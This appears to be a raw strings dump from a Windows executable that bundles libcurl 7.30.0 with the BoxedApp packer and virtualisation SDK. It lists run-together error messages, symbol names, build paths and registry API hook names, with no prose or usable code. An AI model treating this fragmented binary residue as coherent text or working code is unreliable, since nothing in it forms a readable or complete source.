pseudo relocation protocol version %d.Unknown pseudo relocation bit size %d.%s: option requires an argument -- %c%s: unrecognised option `-%s'%s: invalid option -- %coption `%s%s' doesn't accept an argumentoption `%s%s' requires an argument%s: option `%s' is ambiguous%s: unrecognised option `%s'01234567891399780752 312curl_easy_cleanupcurl_easy_initcurl_easy_performcurl_easy_resetcurl_easy_setoptcurl_global_initcurl_slist_appendcurl_slist_free_allcurl_versionpthread_joinlibcurl-4.dllKERNEL32.dllmsvcrt.dllpthreadGC2.dllWS2_32.dllzcÁKERNEL32.DLLUSER32.DLLEnumChildWindowskernel32.dllntdll.dllmscoree.dll.mixcrtPlease contact the application's support team for more information.- Attempt to initialize the CRT more than once.- CRT not initialized- floating point support not loadedGetProcessWindowStationoperatorUSER32.dllSHELL32.dllOLEAUT32.dllGetProcessHeapGetCPInfoGetConsoleOutputCPEXEPackerHost32.exe?m_IID@@3RCU_IMAGE_IMPORT_DESCRIPTOR@@C`.rdata@.data.rsrc@.reloc.\BoxedAppSDK_StaticLib.cppBoxedAppSDK_TryCreateProcessForVirtualEXE_AnotherBitnessPartHelperBoxedAppSDK_AttachMixedBitnessProcessHelperBoxedAppSDK_EnumVirtualRegKeysABoxedAppSDK_EnumVirtualRegKeysWBoxedAppSDK_ExecuteDotNetApplicationABoxedAppSDK_ExecuteDotNetApplicationWBoxedAppSDK_DeleteVirtualRegKeyByHandleBoxedAppSDK_DeleteVirtualRegKeyWBoxedAppSDK_DeleteVirtualRegKeyABoxedAppSDK_CreateVirtualRegKeyWBoxedAppSDK_CreateVirtualRegKeyAC62E2B35-E4B3-4019-A7C4-F50AC7F78470Get exe dir...Get exe dir...doneGet the extension...doneGet current dir...doneGet old args...doneThe command line overriding: %sGetCommandLineW preparing to intercept...doneGetCommandLineA preparing to intercept...doneThe embedding BoxedApp into child processes: %sGetWindowsDirectoryWRegCreateKeyExWRegDeleteKeyWRegCloseKeyADVAPI32.dllole32.dllEXEPackerStub32.dlld:\build_area\boxedapp_src\src\boxedappsolution\exepackerstub\!output\exepackerstub32\release_full\EXEPackerStub32.pdbl$D9.tOFTPSWu$D TryCreateProcessForVirtualEXE, template exe found:CBoxedAppCore::My_NtDeleteKey, KeyHandle = 0xCBoxedAppCore::My_NtEnumerateValueKey, KeyHandle = 0xCBoxedAppCore::My_NtFlushKey, KeyHandle = 0xCBoxedAppCore::My_NtNotifyChangeKey, KeyHandle = 0xCBoxedAppCore::My_NtQueryKey, KeyHandle =CBoxedAppCore::My_NtQueryMultipleValueKey, KeyHandle =CBoxedAppCore::My_NtSetInformationKey, KeyHandle = 0xKernelBase.dll0x%x%xCBoxedAppCore::My_NtCreateKey, ObjectAttributes = 'CBoxedAppCore::My_NtDeleteValueKey, KeyHandle = 0xCBoxedAppCore::My_NtLoadKey, DestinationKeyName = 'CBoxedAppCore::My_NtQueryValueKey, KeyHandle = 0xCBoxedAppCore::My_NtReplaceKey, BackupHiveFileName = 'CBoxedAppCore::My_NtSetValueKey, KeyHandle = 0xCBoxedAppCore::My_NtUnloadKey, DestinationKeyName = 'CBoxedAppCore::My_NtRenameKey, KeyHandle =BoxedAppSDK::CBoxedAppCore::TryCreateProcessForVirtualEXE_AnotherBitnessPart: Can't create process of rundll32.exe, last error ={4F95F74C-9713-4181-ACDD-8A50195FBC0F}BoxedAppSDK::CBoxedAppCore::AttachToProcess_WithProcessHelperBoxedAppSDK::CBoxedAppCore::AttachMixedBitnessProcessHelperCBoxedAppCore::My_NtLoadKey2, DestinationKeyName = 'CBoxedAppCore::My_NtRestoreKey, KeyHandle = 0xCBoxedAppCore::My_NtSaveKey, KeyHandle = 0x:\VirtualDllWithSameImport.dll:\VirtualDllWithTls.dllVirtualDllWithTls.dllVirtualDllWithSameImport.dllWinExecadvapi32.dllNtRenameKeyNtUnloadKeyNtSetValueKeyNtSetInformationKeyNtSaveKeyNtRestoreKeyNtReplaceKeyNtQueryValueKeyNtQueryMultipleValueKeyNtQueryKeyNtOpenKeyExNtOpenKeyNtNotifyChangeKeyNtLoadKey2NtLoadKeyNtFlushKeyNtEnumerateValueKeyNtEnumerateKeyNtDeleteValueKeyNtDeleteKeyNtCreateKey[BOXEDAPP][pid:%d][tid:%d][ %.2d:%.2d:%.2d.%.3d]FILE_EXECUTEGENERIC_EXECUTEKEY_WOW64_64KEYKEY_WOW64_32KEYKEY_NOTIFYKEY_CREATE_LINKKEY_ENUMERATE_SUB_KEYSKEY_CREATE_SUB_KEYKEY_SET_VALUEKEY_QUERY_VALUESECTION_MAP_EXECUTEPAGE_EXECUTE_WRITECOPYPAGE_EXECUTE_READWRITEPAGE_EXECUTE_READPAGE_EXECUTESTATUS_PRIMARY_TRANSPORT_CONNECT_FAILEDSTATUS_LOCAL_USER_SESSION_KEYSTATUS_NULL_LM_PASSWORDSTATUS_IMAGE_MACHINE_TYPE_MISMATCH_EXESTATUS_CARDBUS_NOT_SUPPORTEDSTATUS_INVALID_PORT_ATTRIBUTESSTATUS_PORT_MESSAGE_TOO_LONGSTATUS_PORT_DISCONNECTEDSTATUS_PORT_CONNECTION_REFUSEDSTATUS_INVALID_PORT_HANDLESTATUS_PORT_ALREADY_SETSTATUS_EAS_NOT_SUPPORTEDSTATUS_CTL_FILE_NOT_SUPPORTEDSTATUS_WRONG_PASSWORDSTATUS_ILL_FORMED_PASSWORDSTATUS_PASSWORD_RESTRICTIONSTATUS_PASSWORD_EXPIREDSTATUS_FLOAT_DENORMAL_OPERANDSTATUS_FLOAT_INVALID_OPERATIONSTATUS_PIPE_NOT_AVAILABLESTATUS_INVALID_PIPE_STATESTATUS_PIPE_BUSYSTATUS_PIPE_DISCONNECTEDSTATUS_PIPE_CLOSINGSTATUS_PIPE_CONNECTEDSTATUS_PIPE_LISTENINGSTATUS_NOT_SUPPORTEDSTATUS_PIPE_EMPTYSTATUS_WRONG_PASSWORD_CORESTATUS_PIPE_BROKENSTATUS_DISK_OPERATION_FAILEDSTATUS_KEY_DELETEDSTATUS_KEY_HAS_CHILDRENSTATUS_NO_USER_SESSION_KEYSTATUS_PASSWORD_MUST_CHANGESTATUS_PORT_UNREACHABLESTATUS_LOGIN_TIME_RESTRICTIONSTATUS_LOGIN_WKSTA_RESTRICTIONSTATUS_UNSUPPORTED_COMPRESSIONSTATUS_NO_USER_KEYSSTATUS_NOT_EXPORT_FORMATSTATUS_TRANSPORT_FULLSTATUS_WMI_NOT_SUPPORTEDSTATUS_SAM_NEED_BOOTKEY_PASSWORDSTATUS_SAM_NEED_BOOTKEY_FLOPPYSTATUS_STRONG_CRYPTO_NOT_SUPPORTEDSTATUS_NOT_SUPPORTED_ON_SBSSTATUS_CSS_KEY_NOT_PRESENTSTATUS_CSS_KEY_NOT_ESTABLISHEDSTATUS_NO_KERB_KEYSTATUS_UNSUPPORTED_PREAUTHSTATUS_PORT_NOT_SETSTATUS_INVALID_IMPORT_OF_NON_DLLSTATUS_SMARTCARD_NO_KEY_CONTAINERSTATUS_SMARTCARD_NO_CERTIFICATESTATUS_SMARTCARD_NO_KEYSETSTATUS_SMARTCARD_CERT_REVOKEDSTATUS_SMARTCARD_CERT_EXPIREDSTATUS_SXS_KEY_NOT_FOUNDSTATUS_CLUSTER_JOIN_IN_PROGRESSSTATUS_CLUSTER_JOIN_NOT_IN_PROGRESSRegDeleteKeyExWNtRequestWaitReplyPortNtConnectPortNtReplyPortNtCompleteConnectPortNtAcceptConnectPortNtReplyWaitReceivePortNtCreateWaitablePortImported function,.dataIt's impossible to create virtual file: parent file is virtual, but passed pBehavior is not NULLIt's impossible to create virtual file: passed pBehavior doesn't support Behavior::IVirtualFileStreamIt's impossible to create virtual file: parent node is virtual, but passed pBehavior is not NULLBoxedAppSDK::Registry::Impl::CRegistry::GetAllChildsKeysNtEnumerateKey() returned unexpected error, status =, RegTree::IEnumKeyNode::GetNext() failed, hr =BoxedAppSDK::Registry::Impl::CRegistry::EnumVirtualRegKeys, RegTree::IKeyNode::EnumKeys() failed, hr =: RegTree::IEnumKeyNode::GetNext() failed, hr =: GetAllChildsKeys() failed, status =BoxedAppSDK::Registry::Impl::CRegistry::NtQueryKeyInternal: RegTree::IKeyNode::EnumKeys() failed, hr =BoxedAppSDK::Registry::Impl::CRegistry::GetFullRegKeyPatherror, IVirtualKeyHandle_GetFullPath() returnedInvalid key information class:KeySetHandleTagsInformation is not supported for virtual handleKeySetDebugInformation is not supported for virtual handleKeySetVirtualizationInformation is not supported for virtual handleKeyControlFlagsInformation is not supported for virtual handleKeyWow64FlagsInformation is not supported for virtual handleWe still don't process NtQueryObject / ObjectBasicInformation for virtual key handlesWe still don't process NtQueryObject / ObjectTypeInformation for virtual key handles: IVirtualKeyHandle::Rename() failed, hr =: RegTree::IKeyNode::Remove() failed, hr =BoxedAppSDK::Registry::Impl::CRegistry::NtRenameKeyInternal: RegTree::IKeyNode::AddKey() failed, hr =: result hkey =: IVirtualKey::CreateKey() failed, hr =: we can't create a virtual key with its own behavior under another virtual key: Handles::CreateVirtualKeyHandle() failed, hr =: IVirtualKey::OpenKey() failed, hr =: RegImpl::CreateKeyOnSharedMem() failed, hr =: GetFullRegKeyPath() failed for the hKey =: Handles::IVirtualKeyHandle::CreateKey() failed and returned: passed pBehavior is not NULL, but parent key is virtual, so we can't create a keyBoxedAppSDK::Registry::Impl::CRegistry::CreateVirtualRegKey: lpSubKey: "BoxedAppSDK::Registry::Impl::CRegistry::SearchStartingFromRealKey: Handles::CreateVirtualKeyHandle() failedBoxedAppSDK::Registry::Impl::CRegistry::NtCreateKeyInternal: SearchStartingFromRealKey() failed: RegTree::IKeyNode::FindValue() failed, hr =BoxedAppSDK::Registry::Impl::CRegistry::NtDeleteValueKeyInternal: IVirtualKeyHandle::put_Value() failed, hr =BoxedAppSDK::Registry::Impl::CRegistry::GetRealKeyLastWriteTime: NtQueryKey() failed, status =: NtOpenKey() failed, hr =BoxedAppSDK::Registry::Impl::CRegistry::HasRealKeySubKeys: NtEnumerateValueKey() failed when we tried to get name of the node, status =: IKeyNode::EnumValues() failed, hr =: Behavior::IVirtualKeyHandle::EnumKeys() failed, hr =: Behavior::IVirtualKeyHandle::EnumValues() failed, hr =BoxedAppSDK::Registry::Impl::CRegistry::NtEnumerateValueKeyInternalBoxedAppSDK::Registry::Impl::CRegistry::NtOpenKeyInternal: invalid KeyInformationClass passed:: IVirtualKeyHandle_GetFullPath() failed, hr =: Behavior::IEnumVirtualKey::GetNext() failed, hr =: IVirtualKeyHandle::EnumValues() failed, hr =: IVirtualKeyHandle::EnumKeys() failed, hr =: IVirtualKeyHandle::get_LastWriteTime() failed, hr =reg:NtQueryMultipleValueKey(: IKeyNode::FindValue() failed, hr =: IVirtualKeyHandle::get_Value() failed, hr =BoxedAppSDK::Registry::Impl::CRegistry::NtQueryValueKeyInternal: IVirtualKeyHandle::get_ValueType() failed, hr =reg:NtSetInformationKey(RegTree::IKeyNode::RemoveValue() failed, hrBoxedAppSDK::Registry::Impl::CRegistry::NtSetValueKeyInternalreg:NtRenameKey(RegTree::IEnumKeyNode::GetNext(), hr =RegTree::IKeyNode::EnumKeys(), hr =: IEnumVirtualKey::GetNext() failed, hr =BoxedAppSDK::Registry::Impl::CRegistry::NtDeleteKeyInternalreg:NtDeleteValueKey(: NtEnumerateKey() failed when we tried to get name of the node, status =, Behavior::IVirtualKeyHandle::get_Prop() failed, hr =, Behavior::IVirtualKey::OpenKey() failed, hr =: IKeyNode::EnumKeys() failed, hr =BoxedAppSDK::Registry::Impl::CRegistry::NtEnumerateKeyInternalreg:NtEnumerateValueKey(reg:NtQueryKey(reg:NtQueryValueKey(reg:NtSetValueKey(reg:NtCreateKey(reg:NtDeleteKey(reg:NtEnumerateKey(reg:NtOpenKey(RegOpenKeyExWRegOpenKeyWbxsdk32.dlld:\build_area\boxedapp_src\src\boxedappsolution\release_full\bxsdk32.pdb`.rsrcv2.0.50727BoxedAppSDK_AppDomainManager.dllSystem.Security.ctorSystem.Security.PolicySystem.ReflectionSystem.Runtime.InteropServicesSystem.DiagnosticsSystem.Runtime.CompilerServicesSystem.CollectionsSystem.Security.PermissionsSystem.IODllImportAttributeshell32.dlllpCmdLine1.0.0.0$87cd9ac9-2a94-4a9b-aee1-8d25d6a19f78D:\build_area\boxedapp_src\src\BoxedAppSolution\DotNetAppDomainManager\obj\x86\Release_Full\BoxedAppSDK_AppDomainManager.pdbBoxedAppSDKThunk32.dlld:\build_area\boxedapp_src\src\boxedappsolution\release_full\BoxedAppSDKThunk32.pdb.relocTLSSupport32.dlld:\build_area\boxedapp_src\src\boxedappsolution\release_full\TLSSupport32.pdb9 9$9(9,9094!40484}4:$:,:5:::{:?#?2?9?@?1 1$1(1,10141819$=(=,=0=4=8=<=@=6 6$6(6,6064686<6@61"26233'44 40454:4:":2:7:>;,10141818 8$8(8,8P`.data.edata0@.idataSShPiSSh}ipurl/j.RPjlibgcj_s.dllCouldn't open file %sCan't open %s for writingCan't get the size of %sLast-Modified: %s, d %s M d:d:d GMT%c%c==%c%c%c=%c%c%c%c%s:%d%5[^:]:%d:%5sResolve %s found illegal!Added %s:%d:%s to DNS cachetimeout on name lookup is not supported%3lld %s %3lld %s %3lld %s %s %s %s %s %s %s; filename="%s"%s; boundary=%sContent-Type: multipart/mixed, boundary=%sContent-Type: %scouldn't open file "%s"--%s--p.jpgp.jpegp.txtp.htmlp.xml#HttpOnly_23[^;=]=I99[^;httponlyskipped cookie with illegal dotcount domain: %sskipped cookie with bad tailmatch domain: %s%s cookie %s="%s" for domain %s, path %s, expire %lld# Netscape HTTP Cookie File# http://curl.haxx.se/docs/http-cookies.html# This file was generated by libcurl! Edit at your own risk.# Fatal libcurl errorWARNING: failed to save cookies in %sAvoided giant realloc for header (max is %d)!HTTP/The requested URL returned error: %d%s, d %s M d:d:d GMTIf-Modified-Since: %sIf-Unmodified-Since: %sLast-Modified: %s%sAuthorization: Basic %s%s auth using %s with user '%s'Referer: %sAccept-Encoding: %s%s, TEChunky upload is not supported by HTTP 1.0Host: %s%s%sHost: %s%s%s:%huftp://;type=%cRange: bytes=%sContent-Range: bytes %s%lld/%lldContent-Range: bytes %s/%lldftp://%s:%s@%s%s HTTP/%s%s%s%s%s%s%s%s%s%s%s%s%s%s=%sInternal HTTP POST error!Content-Type: application/x-www-form-urlencodedFailed sending HTTP POST requestFailed sending HTTP requestHTTP error before end of send, stop sendingHTTP/%d.%d =HTTP =RTSP/%d.%d =The requested URL returned error: %sHTTP 1.0, assume close after bodyHTTP/1.0 proxy connection set to keep alive!HTTP/1.1 proxy connection set close!HTTP/1.0 connection set to keep alive![%s %s %s]Recv failure: %sSend failure: %s/etc/ssl/certs/ca-certificates.crtIDN support not present, can't parse Unicode domainsConnected to %s (%s) port %ld (#%ld)%5[^:@]:%5[^@][%*45[0123456789abcdefABCDEF:.]%c%s://%s%s%s:%hu%s%s%sPort number too large: %luCouldn't resolve host '%s'Couldn't resolve proxy '%s'User-Agent: %sAbout to connect() to %s%s port %ld (#%ld)Curl_addHandleToPipeline: length: %dClosing connection %dConnection #%ld to host %s left intactFound bundle for host %s: %pServer doesn't support pipeliningConnection %d seems to be dead![^:]:%[^:]://%[^malformed :%5[^@]Protocol %s not supported or disabled in libcurl%s://%sCouldn't find host %s in the _netrc file; using defaultsftp@example.comFound connection %d, with requests in the pipe (%d)Re-using existing connection! (#%ld) with host %sCURLOPT_SSL_VERIFYHOST no longer supports 1 as value!Operation too slow. Less than %ld bytes/sec transferred the last %ld secondszlib/%s7.30.0%%Xloginpassword[^?&/:]://%cIssue another request to this URL: '%s'Violate RFC 2616/10.3.2 and switch from POST to GETViolate RFC 2616/10.3.3 and switch from POST to GETDisables POST, goes with %sNo URL set!seek callback returned error %dthe ioctl callback returned %dioctl callback returned error %doperation aborted by callbackRewinding stream by : %zd bytes on url %s (zero-length body)Excess found in a non pipelined read: excess = %zd url = %s (zero-length body)HTTP server doesn't seem to support byte ranges. Cannot resume.Problem (%d) in the Chunked-Encoded dataRewinding stream by : %zu bytes on url %s (size = %lld, maxdownload = %lld, bytecount = %lld, nread = %zd)Excess found in a non pipelined read: excess = %zu, size = %lld, maxdownload = %lld, bytecount = %lldUnrecognized content encoding type. libcurl understands `identity', `deflate' and `gzip' content encodings.Operation timed out after %ld milliseconds with %lld out of %lld bytes receivedOperation timed out after %ld milliseconds with %lld bytes receivedpUnrecognized content encoding type. libcurl understands `identity', `deflate' and `gzip' content encodings.psa_addr inet_ntop() failed with errno %d: %sTrying %s...Could not set TCP_NODELAY: %sTCP_NODELAY setFailed to set SO_KEEPALIVE on fd %dFailed to set SIO_KEEPALIVE_VALS on fd %d: %dCouldn't bind to interface '%s'Local Interface %s is ip %s using address family %iName '%s' family %i resolved to '%s' family %iCouldn't bind to '%s'getsockname() failed with errno %d: %sLocal port: %huBind to local port %hu failed, trying nextbind failed with errno %d: %sFailed to connect to %s: %scouldn't connect to %s at %s:%dgetpeername() failed with errno %d: %sssrem inet_ntop() failed with errno %d: %sssloc inet_ntop() failed with errno %d: %sFailed connect to %s:%ld; %spInternal error clearing splay node = %dInternal error removing splay node = %dpPipe broke: handle 0x%p, url = %sIn state %d with no easy_conn, bail out!Error while processing content unencoding: %s1.2.81.2.0.4px%s:%s:%s%s:%.*s%s:%s:x:%s:%s:%s%sAuthorization: Digest username="%s", realm="%s", nonce="%s", uri="%s", cnonce="%s", nc=x, qop=%s, response="%s"%sAuthorization: Digest username="%s", realm="%s", nonce="%s", uri="%s", response="%s"%s, opaque="%s"%s, algorithm="%s"Unsupported protocolURL using bad/illegal format or missing URLA requested feature, protocol or option was not found built-in in this libcurl due to a build-time decision.FTP: weird server replyFTP: The server failed to connect to data portFTP: Accepting server connect has timed outFTP: The server did not accept the PRET command.FTP: unknown PASS replyFTP: unknown PASV replyFTP: unknown 227 response formatFTP: can't figure out the host in the PASV responseFTP: couldn't set file typeFTP: couldn't retrieve (RETR failed) the specified fileHTTP response code said errorFTP: command PORT failedFTP: command REST failedOperation was aborted by an application callbackA libcurl function was given a bad argumentAn unknown option was passed in to libcurlSSL peer certificate or SSH remote key was not OKProblem with the local SSL certificatePeer certificate cannot be authenticated with given CA certificatesProblem with the SSL CA cert (path? access rights?)Unrecognized or bad HTTP Content or Transfer-EncodingInvalid LDAP URLIssuer check against peer certificate failedLogin deniedTFTP: File Not FoundTFTP: Access ViolationTFTP: Illegal operationTFTP: Unknown transfer IDTFTP: No such userCaller must register CURLOPT_CONV_ callback optionsError in the SSH layerUnable to parse FTP file listPlease call curl_multi_perform() soonCURLSHcode unknownProtocol option is unsupportedProtocol is unsupportedSocket is unsupportedOperation not supportedAddress family not supportedProtocol family not supportedWinsock version not supportedUnknown error %d (%#x)Curl_ipv4_resolve_r failed for %s%d.%d.%d.%dd:d:dd:dUser was rejected by the SOCKS5 server (%d %d).SOCKS5 GSSAPI per-message authentication is not supported.No authentication method was acceptable. (It is quite likely that the SOCKS5 server wanted a username/password, since none was supplied to the server on this connection.)Failed to resolve "%s" for SOCKS5 connect.Can't complete SOCKS5 connection to %d.%d.%d.%d:%d. (%d)Can't complete SOCKS5 connection to %s:%d. (%d)Can't complete SOCKS5 connection to xx:xx:xx:xx:xx:xx:xx:xx:%d. (%d)Failed to resolve "%s" for SOCKS4 connect.SOCKS4%s request granted.Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected or failed.Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because SOCKS server cannot connect to identd on the client.Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because the client program and identd report different user-ids.Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), Unknown.Establish HTTP proxy tunnel to %s:%hu%s:%hu%s%s%s:%huHost: %sCONNECT %s HTTP/%s%s%s%s%sHTTP/1.%d %dTUNNEL_STATE switched to: %dReceived HTTP code %d from proxy after CONNECT%s/%susername="%s",realm="%s",nonce="%s",cnonce="%s",nc="%s",digest-uri="%s",response=%s0000000112345678%s xxxxxxxxxxxxxxxx- Conn %d (%p) send_pipe: %d, recv_pipe: %dServer %s is blacklistedServer %s is not blacklistedSite %s:%d is pipeline blacklistedAdding handle: send: %dAdding handle: recv: %dConn: %d (%p) Receive pipe weight: (%d/%d), penalized: %dcurl_easy_duphandlecurl_easy_escapecurl_easy_getinfocurl_easy_pausecurl_easy_recvcurl_easy_sendcurl_easy_strerrorcurl_easy_unescapecurl_escapecurl_formaddcurl_formfreecurl_formgetcurl_freecurl_getdatecurl_getenvcurl_global_cleanupcurl_global_init_memcurl_maprintfcurl_mfprintfcurl_mprintfcurl_msnprintfcurl_msprintfcurl_multi_add_handlecurl_multi_assigncurl_multi_cleanupcurl_multi_fdsetcurl_multi_info_readcurl_multi_initcurl_multi_performcurl_multi_remove_handlecurl_multi_setoptcurl_multi_socketcurl_multi_socket_actioncurl_multi_socket_allcurl_multi_strerrorcurl_multi_timeoutcurl_multi_waitcurl_mvaprintfcurl_mvfprintfcurl_mvprintfcurl_mvsnprintfcurl_mvsprintfcurl_share_cleanupcurl_share_initcurl_share_setoptcurl_share_strerrorcurl_strequalcurl_strnequalcurl_unescapecurl_version_infoADVAPI32.DLLWS2_32.DLLzlib1.dll8 8$8(8,8082 2$2(2,2024282DllMainCRTStartupGNU C 4.2.1-sjlj (mingw32-2)/home/ron/devel/debian/mingw32-runtime/mingw32-runtime-3.13/build_dir/src/mingw-runtime-3.13-20070825-1/dllcrt1.cDllMainCRTStartup@12dllcrt1.c.filehttp.cftp.curl.c_Curl_docurl_fnmatch.cftplistparser.chttp_chunks.chttp_digest.ccurl_rand.chttp_negotiate.ctftp.cssh.ccurl_addrinfo.ccurl_sspi.ccurl_memrchr.csmtp.ccurl_threads.ccurl_rtmp.ccurl_gethostname.chttp_proxy.ccurl_gssapi.ccurl_ntlm.ccurl_ntlm_wb.ccurl_ntlm_core.ccurl_ntlm_msgs.ccurl_sasl.ccurl_schannel.ccurl_multibyte.ccurl_darwinssl.cpipeline.c.idata$7.idata$5.idata$48.idata$6.idata$4(.idata$4,.idata$44.idata$40.idata$4.idata$7`.idata$7\.idata$7l.idata$4.idata$7x.idata$6|.idata$6T.idata$7|.idata$7d.idata$7t.idata$6d.idata$6D.idata$64.idata$7h.idata$7p.idata$6l.idata$6$.idata$2P.idata$5|.idata$4$.idata$6(.idata$6P.idata$60.idata$68.idata$2(.idata$4`.idata$6h.idata$4L.idata$6\.idata$5@.idata$7(.idata$5P.idata$7H.idata$5p.idata$6t.idata$7D.idata$5l.idata$5<.idata$4@.idata$4H.idata$6,.idata$5.idata$4l.idata$4T.idata$7<.idata$5d.idata$74.idata$5\.idata$6<.idata$4<.idata$5D.idata$7,.idata$5T.idata$5,.idata$4x.idata$5$.idata$4p.idata$78.idata$5`.idata$6H.idata$4h.idata$5(.idata$4t.idata$7.idata$5H.idata$7@.idata$5h.idata$6`.idata$70.idata$5X.idata$4X.idata$58.idata$4D.idata$4P.idata$50.idata$4|.idata$7$.idata$5L.idata$4\.idata$4d.idata$7L.idata$5t.idata$54.idata$2<.idata$5x.idata$7P.idata$6p.idata$7T.idata$2.idata$7X.idata$6X.idata$6.idata$2d.debug_aranges.debug_pubnames.debug_info.debug_abbrev.debug_line.debug_frame.debug_loc_DllMainCRTStartup@12_curlx_tvdiff_curlx_tvdiff_secs_Curl_tvlong_curlx_tvnow_Curl_base64_encode_Curl_base64_decode_Curl_num_addresses_Curl_resolv_unlock_Curl_hostcache_clean_Curl_hostcache_destroy_Curl_mk_dnscache_Curl_hostcache_prune_Curl_cache_addr_Curl_loadhostpairs_Curl_resolv_Curl_resolv_timeout_Curl_printable_address_Curl_global_host_cache_dtor_Curl_global_host_cache_init_Curl_pgrsSetDownloadCounter_Curl_pgrsSetUploadCounter_Curl_pgrsSetDownloadSize_Curl_pgrsSetUploadSize_Curl_pgrsResetTimesSizes_Curl_pgrsStartNow_Curl_pgrsUpdate_Curl_pgrsDone_Curl_pgrsTime_Curl_formclean_curl_formfree_Curl_FormInit_Curl_formpostheader_Curl_FormReader_Curl_getformdata_curl_formget_curl_formadd_Curl_cookie_freelist_Curl_cookie_clearall_Curl_cookie_clearsess_Curl_cookie_cleanup_Curl_cookie_list_Curl_cookie_getlist_Curl_cookie_add_Curl_cookie_init_Curl_cookie_loadfiles_Curl_flush_cookies_http_should_fail_Curl_add_buffer_init_http_getsock_do_use_http_1_1_Curl_add_buffer_checkhttpprefix_Curl_checkheaders_Curl_compareheader_http_perhapsrewind_Curl_http_auth_act_Curl_http_done_Curl_http_connect_Curl_add_bufferf_Curl_add_timecondition_Curl_add_custom_headers_Curl_add_buffer_send_Curl_http_input_auth_Curl_http_output_auth_Curl_http_Curl_http_readwrite_headers_Curl_write_Curl_debug_Curl_read_Curl_read_plain_Curl_sendf_Curl_failf_Curl_client_write_Curl_recv_plain_Curl_send_plain_Curl_write_plain_Curl_infof_Curl_freeset_Curl_init_userdefined_Curl_protocol_getsock_Curl_doing_getsock_Curl_protocol_connecting_Curl_protocol_doing_Curl_reset_reqproto_Curl_do_more_Curl_verboseconnect_Curl_isPipeliningEnabled_IsPipeliningPossible_parse_remote_port_Curl_open_Curl_protocol_connect_Curl_connected_proxy_Curl_setup_conn_Curl_removeHandleFromPipeline_Curl_getoff_all_pipelines_Curl_addHandleToPipeline_signalPipeClose_Curl_disconnect_Curl_done_Curl_handler_dummy_Curl_connect_Curl_setopt_Curl_close_Curl_dupset_Curl_if_is_interface_name_Curl_if2ip_Curl_speedcheck_Curl_speedinit_curl_version_info_curl_version_curl_getenv_curl_free_Curl_urldecode_curl_easy_unescape_curl_unescape_curl_easy_escape_curl_escape_curl_msnprintf_curl_mvfprintf_curl_mvprintf_curl_mvsprintf_curl_mfprintf_curl_mprintf_curl_msprintf_curl_mvaprintf_curl_maprintf_curl_mvsnprintf_Curl_parsenetrc_Curl_initinfo_Curl_getinfo_Curl_single_getsock_Curl_sleep_time_Curl_posttransfer_strlen_url_strcpy_url_Curl_setup_transfer_Curl_meets_timecondition_Curl_reconnect_request_Curl_follow_Curl_pretransfer_Curl_readrewind_Curl_retry_request_Curl_fillreadbuffer_Curl_readwrite_curl_strnequal_curl_strequal_Curl_easy_addmulti_curl_easy_send_curl_easy_recv_curl_easy_pause_Curl_easy_initHandleData_curl_easy_reset_curl_easy_duphandle_curl_easy_getinfo_curl_easy_cleanup_curl_easy_perform_curl_easy_setopt_curl_global_cleanup_curl_global_init_curl_easy_init_curl_global_init_mem_Curl_fnmatch_Curl_fileinfo_dtor_Curl_fileinfo_alloc_Curl_wildcard_dtor_Curl_wildcard_init_Curl_httpchunk_init_Curl_httpchunk_read_Curl_strtok_r_Curl_persistconninfo_Curl_socket_Curl_closesocket_Curl_getconnectinfo_Curl_timeleft_Curl_sndbufset_Curl_connecthost_Curl_updateconninfo_Curl_is_connected_Curl_llist_alloc_Curl_llist_insert_next_Curl_llist_remove_Curl_llist_destroy_Curl_llist_count_Curl_llist_move_Curl_hash_pick_Curl_hash_str_Curl_hash_start_iterate_Curl_hash_next_element_Curl_str_key_compare_Curl_hash_clean_with_criterium_Curl_hash_delete_Curl_hash_clean_Curl_hash_destroy_Curl_hash_add_Curl_hash_init_Curl_hash_alloc_fd_key_compare_multi_freeamsg_Curl_multi_pipeline_enabled_Curl_multi_handlePipeBreak_Curl_multi_set_easy_connection_Curl_multi_max_host_connections_Curl_multi_max_total_connections_Curl_multi_max_pipeline_length_Curl_multi_content_length_penalty_size_Curl_multi_chunk_length_penalty_size_Curl_multi_pipelining_site_bl_Curl_multi_pipelining_server_bl_curl_multi_assign_Curl_expire_Curl_multi_process_pending_handles_curl_multi_timeout_curl_multi_fdset_curl_multi_setopt_curl_multi_info_read_curl_multi_cleanup_curl_multi_perform_curl_multi_socket_all_curl_multi_socket_action_curl_multi_socket_curl_multi_wait_curl_multi_remove_handle_curl_multi_add_handle_curl_multi_init_Curl_unencode_cleanup_Curl_unencode_gzip_write_Curl_unencode_deflate_write_curl_share_init_Curl_share_lock_Curl_share_unlock_curl_share_cleanup_curl_share_setopt_Curl_digest_cleanup_Curl_output_digest_Curl_input_digest_Curl_MD5_init_Curl_MD5_update_Curl_MD5_final_Curl_md5it_Curl_rand_Curl_srand_Curl_inet_pton_curl_easy_strerror_curl_multi_strerror_curl_share_strerror_Curl_strerror_Curl_ipvalid_Curl_ipv4_resolve_r_Curl_getaddrinfo_Curl_set_dns_servers_Curl_inet_ntop_Curl_gmtime_curl_getdate_Curl_wait_ms_Curl_poll_Curl_socket_check_Curl_clone_ssl_config_Curl_free_ssl_config_Curl_ssl_config_matches_Curl_splay_Curl_splayinsert_KEY_NOTUSED.17658_Curl_splaygetbest_Curl_splayremovebyaddr_Curl_blockread_all_Curl_SOCKS5_Curl_SOCKS4_Curl_raw_toupper_Curl_raw_equal_Curl_raw_nequal_Curl_strntoupper_Curl_freeaddrinfo_Curl_he2ai_Curl_ip2addr_Curl_str2addr_curl_slist_append_curl_slist_free_all_Curl_slist_duplicate_curlx_nonblock_Curl_memrchr_curlx_ultous_curlx_ultouc_curlx_ultosi_curlx_uztosi_curlx_uztoul_curlx_uztoui_curlx_sltosi_curlx_sltoui_curlx_sltous_curlx_uztosz_curlx_sotouz_curlx_sztosi_curlx_sitouz_curlx_sktosi_curlx_sitosk_Curl_HMAC_init_Curl_HMAC_update_Curl_HMAC_final_Curl_gethostnamehttp_negotiate_sspi.c_Curl_proxyCONNECT_Curl_proxy_connect_Curl_sasl_cleanup_Curl_sasl_create_login_message_sasl_digest_get_key_value_Curl_sasl_create_digest_md5_message_Curl_sasl_create_cram_md5_message_Curl_sasl_create_plain_message_Curl_bundle_remove_conn_Curl_bundle_add_conn_Curl_bundle_destroy_Curl_bundle_create_Curl_conncache_